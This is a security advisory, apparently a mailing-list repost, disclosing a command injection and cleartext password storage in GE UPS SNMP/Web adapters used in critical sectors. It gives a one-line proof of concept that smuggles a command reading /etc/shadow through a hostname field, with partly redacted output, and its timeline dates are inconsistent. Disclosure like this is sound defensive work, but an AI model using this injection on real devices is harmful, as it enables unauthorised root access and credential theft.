Home / os / winmobile

GE Industrial Solutions UPS SNMP Adapter Command Injection

Posted on 04 February 2016

GE Industrial Solutions - UPS SNMP Adapter Command Injection and Clear-text Storage of Sensitive Information Vulnerabilities *Timelines:* Reported to ICS-CERT on: July 06, 2015 Fix & Advisory Released by GE: January 25, 2015 Vulnerability ID: GEIS16-01 *GE Advisory: * http://apps.geindustrial.com/publibrary/checkout/GEIS_SNMP?TNR=Application%20and%20Technical|GEIS_SNMP|PDF&filename=GEIS_SNMP.pdf <http://apps.geindustrial.com/publibrary/checkout/GEIS_SNMP?TNR=Application%20and%20Technical%7CGEIS_SNMP%7CPDF&filename=GEIS_SNMP.pdf> *ICS-CERT Advisory:*In Progress *About GE* GE is a US-based company that maintains offices in several countries around the world. The affected product, SNMP/Web Interface adapter, is a web server designed to present information about the Uninterruptible Power Supply (UPS). According to GE, the SNMP/Web Interface is deployed across several sectors including Critical Manufacturing and Energy. GE estimates that these products are used worldwide. *Affected Products* • All SNMP/Web Interface cards with firmware version prior to 4.8 manufactured by GE Industrial Solutions. *CVE-IDs:* CVE-2016-0861 CVE-2016-0862 *VULNERABILITY OVERVIEW* A *COMMAND INJECTIONCVE-2016-0861* Device application services run as (root) privileged user, and does not perform strict input validation. This allows an authenticated user to execute any system commands on the system. Vulnerable function: http://IP/dig.asp <http://ip/dig.asp> Vulnerable parameter: Hostname/IP address *PoC:* In the Hostname/IP address input, enter: ; cat /etc/shadow Output root:<hash>:0:0:root:/root:/bin/sh <...other system users...> ge:<hash>:101:0:gedeups7:/home/admin:/bin/sh root123:<hash>:102:0:gedeups2:/home/admin:/bin/sh B *CLEARTEXT STORAGE OF SENSITIVE INFORMATIONCVE-2016-0862* File contains sensitive account information stored in cleartext. All users, including non-admins, can view/access device's configuration, via Menu option -> Save -> Settings. The application stores all information in clear-text, including *all user logins and clear-text passwords*. +++++ I sent it out on Jan 29 but for some reason, it was not posted to FD. So sending it again. -- Best Regards, Karn Ganeshen ipositivesecurity.blogspot.in

 

TOP